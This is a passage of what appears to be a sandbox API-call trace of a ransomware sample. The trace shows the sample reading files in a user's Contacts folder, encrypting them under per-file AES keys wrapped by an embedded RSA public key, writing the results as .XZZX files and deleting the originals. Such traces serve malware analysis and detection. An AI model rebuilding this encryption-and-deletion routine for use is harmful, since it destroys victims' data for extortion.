nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x43cf860*, lpNumberOfBytesWritten=0x43ce438*=0x28, lpOverlapped=0x0) returned 1 [0034.984] SetFilePointer (in: hFile=0x3e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4c6 [0034.984] WriteFile (in: hFile=0x3e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x43ce438*=0x5, lpOverlapped=0x0) returned 1 [0034.984] SetFilePointer (in: hFile=0x3e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4cb [0034.985] SetErrorMode (uMode=0x1) returned 0x1 [0034.985] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0034.985] OutputDebugStringW (lpOutputString="end") [0034.985] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x43cdbf4, pcbBinary=0x43cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x43cdbf4, pcbBinary=0x43cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0034.985] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x43cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x43cd3dc, pcbStructInfo=0x43cd3d8 | out: pvStructInfo=0x43cd3dc, pcbStructInfo=0x43cd3d8) returned 1 [0034.985] CryptAcquireContextW (in: phProv=0x43cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x43cd3e4*=0x3eacb0) returned 1 [0034.986] CryptImportPublicKeyInfo (in: hCryptProv=0x3eacb0, dwCertEncodingType=0x1, pInfo=0x3dd17d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1808*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1810*, PublicKey.cUnusedBits=0x0), phKey=0x43cd3ec | out: phKey=0x43cd3ec*=0x324a38) returned 1 [0034.986] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0034.986] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0034.986] CryptEncrypt (in: hKey=0x324a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x43cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x43cd3f0*=0x80) returned 1 [0034.986] CryptEncrypt (in: hKey=0x324a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ead38*, pdwDataLen=0x43cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ead38*, pdwDataLen=0x43cd3e8*=0x80) returned 1 [0034.986] WriteFile (in: hFile=0x3e4, lpBuffer=0x3ead38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x3ead38*, lpNumberOfBytesWritten=0x43ce438*=0x80, lpOverlapped=0x0) returned 1 [0034.987] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0034.987] WriteFile (in: hFile=0x3e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x43ce438*=0x5, lpOverlapped=0x0) returned 1 [0034.987] GetUserNameW (in: lpBuffer=0x43ce1f8, pcbBuffer=0x43cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x43cdfe0) returned 1 [0034.987] wsprintfW (in: param_1=0x43cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0034.987] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x43cdfe4 | out: phkResult=0x43cdfe4*=0x3f4) returned 0x0 [0034.987] RegQueryValueExW (in: hKey=0x3f4, lpValueName="E1010314", lpReserved=0x0, lpType=0x43cdfd8, lpData=0x43cdfec, lpcbData=0x43cdfdc*=0x4 | out: lpType=0x43cdfd8*=0x4, lpData=0x43cdfec*=0x8, lpcbData=0x43cdfdc*=0x4) returned 0x0 [0034.987] RegCloseKey (hKey=0x3f4) returned 0x0 [0034.987] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x43cdfe8 | out: phkResult=0x43cdfe8*=0x3f4) returned 0x0 [0034.987] RegSetValueExW (in: hKey=0x3f4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x43cdfec*=0x9, cbData=0x4 | out: lpData=0x43cdfec*=0x9) returned 0x0 [0034.987] RegCloseKey (hKey=0x3f4) returned 0x0 [0034.987] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0034.988] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0034.988] CloseHandle (hObject=0x3e4) returned 1 [0034.991] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0034.992] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0034.992] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact")) returned 1 [0034.993] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact")) returned 0 Thread: id = 100 os_tid = 0x700 [0034.924] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0034.924] lstrcpyW (in: lpString1=0x42cf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0034.924] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0034.924] SetErrorMode (uMode=0x1) returned 0x1 [0034.924] lstrcpyW (in: lpString1=0x42cf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0034.924] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x536f22e3, Data2=0x5a2f, Data3=0x41ba, Data4=([0]=0x88, [1]=0x58, [2]=0xca, [3]=0xad, [4]=0xf, [5]=0xc3, [6]=0x4d, [7]=0xbb))) returned 0x0 [0034.924] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0034.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0034.925] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\63AB35AD17277526536F22E31B54596E.XZZX") returned 80 [0034.925] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0034.925] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", dwFileAttributes=0x20) returned 1 [0034.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3e4 [0034.925] ReadFile (in: hFile=0x3e4, lpBuffer=0x3e2cd60, nNumberOfBytesToRead=0x19c, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e2cd60*, lpNumberOfBytesRead=0x42ce418*=0x19c, lpOverlapped=0x0) returned 1 [0034.925] CloseHandle (hObject=0x3e4) returned 1 [0034.925] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3eb0000 [0034.926] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ec0000 [0034.926] SetErrorMode (uMode=0x1) returned 0x1 [0034.926] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0034.926] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eac28) returned 1 [0034.928] CryptGenKey (in: hProv=0x3eac28, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324ab8) returned 1 [0035.059] CryptExportKey (in: hKey=0x324ab8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0035.059] CryptExportKey (in: hKey=0x324ab8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ec0000, pdwDataLen=0x42ce41c | out: pbData=0x3ec0000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0035.059] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0035.060] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0035.060] CryptDestroyKey (hKey=0x324ab8) returned 1 [0035.060] CryptReleaseContext (hProv=0x3eac28, dwFlags=0x0) returned 0 [0035.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\63AB35AD17277526536F22E31B54596E.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\63ab35ad17277526536f22e31b54596e.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0035.060] WriteFile (in: hFile=0x3d8, lpBuffer=0x3e2cd60*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2cd60*, lpNumberOfBytesWritten=0x42ce438*=0x19c, lpOverlapped=0x0) returned 1 [0035.060] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x19c [0035.060] WriteFile (in: hFile=0x3d8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0035.061] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1a1 [0035.061] WriteFile (in: hFile=0x3d8, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x16, lpOverlapped=0x0) returned 1 [0035.061] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1b7 [0035.061] WriteFile (in: hFile=0x3d8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0035.061] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1bc [0035.061] SetErrorMode (uMode=0x1) returned 0x1 [0035.061] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0035.061] OutputDebugStringW (lpOutputString="end") [0035.061] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0035.061] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0035.061] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3eadc0) returned 1 [0035.062] CryptImportPublicKeyInfo (in: hCryptProv=0x3eadc0, dwCertEncodingType=0x1, pInfo=0x3dd1088*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd10b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd10c0*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x324ab8) returned 1 [0035.062] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0035.062] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0035.062] CryptEncrypt (in: hKey=0x324ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0035.062] CryptEncrypt (in: hKey=0x324ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3eae48*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3eae48*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0035.062] WriteFile (in: hFile=0x3d8, lpBuffer=0x3eae48*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3eae48*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0035.062] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0035.062] WriteFile (in: hFile=0x3d8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0035.062] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0035.063] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0035.063] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x3e4) returned 0x0 [0035.063] RegQueryValueExW (in: hKey=0x3e4, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x9, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0035.063] RegCloseKey (hKey=0x3e4) returned 0x0 [0035.063] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x3e4) returned 0x0 [0035.063] RegSetValueExW (in: hKey=0x3e4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0xa, cbData=0x4 | out: lpData=0x42cdfec*=0xa) returned 0x0 [0035.063] RegCloseKey (hKey=0x3e4) returned 0x0 [0035.063] VirtualFree (lpAddress=0x3eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0035.063] VirtualFree (lpAddress=0x3ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0035.063] CloseHandle (hObject=0x3d8) returned 1 [0035.064] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0035.064] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0035.064] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini")) returned 1 [0035.065] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini")) returned 0 Thread: id = 101 os_tid = 0x5d8 [0035.066] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0035.066] lstrcpyW (in: lpString1=0x417f460, lpString2="lulcit amkdfe.contact" | out: lpString1="lulcit amkdfe.contact") returned="lulcit amkdfe.contact" [0035.066] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0035.066] SetErrorMode (uMode=0x1) returned 0x1 [0035.066] lstrcpyW (in: lpString1=0x417f860, lpString2="lulcit amkdfe.contact" | out: lpString1="lulcit amkdfe.contact") returned="lulcit amkdfe.contact" [0035.066] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x6f162217, Data2=0x6473, Data3=0x4372, Data4=([0]=0xa0, [1]=0x1d, [2]=0x2d, [3]=0xb4, [4]=0x76, [5]=0x89, [6]=0x6d, [7]=0x11))) returned 0x0 [0035.066] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0035.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0035.066] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\8C424C551A76D4366F1622171E8EB87E.XZZX") returned 80 [0035.066] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="XZZX") returned 0x0 [0035.066] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", dwFileAttributes=0x20) returned 1 [0035.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3e0 [0035.067] ReadFile (in: hFile=0x3e0, lpBuffer=0x3e14790, nNumberOfBytesToRead=0x496, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x3e14790*, lpNumberOfBytesRead=0x417e418*=0x496, lpOverlapped=0x0) returned 1 [0035.068] CloseHandle (hObject=0x3e0) returned 1 [0035.068] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0035.068] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0035.068] SetErrorMode (uMode=0x1) returned 0x1 [0035.069] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0035.069] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eaed0) returned 1 [0035.070] CryptGenKey (in: hProv=0x3eaed0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324b38) returned 1 [0035.238] CryptExportKey (in: hKey=0x324b38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0035.238] CryptExportKey (in: hKey=0x324b38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x417e41c | out: pbData=0x3e60000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0035.238] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0035.284] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0035.284] CryptDestroyKey (hKey=0x324b38) returned 1 [0035.284] CryptReleaseContext (hProv=0x3eaf58, dwFlags=0x0) returned 0 [0035.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\8C424C551A76D4366F1622171E8EB87E.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\8c424c551a76d4366f1622171e8eb87e.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3e4 [0035.284] WriteFile (in: hFile=0x3e4, lpBuffer=0x3e14790*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e14790*, lpNumberOfBytesWritten=0x417e438*=0x496, lpOverlapped=0x0) returned 1 [0035.285] SetFilePointer (in: hFile=0x3e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x496 [0035.285] WriteFile (in: hFile=0x3e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0035.285] SetFilePointer (in: hFile=0x3e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x49b [0035.285] WriteFile (in: hFile=0x3e4, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, 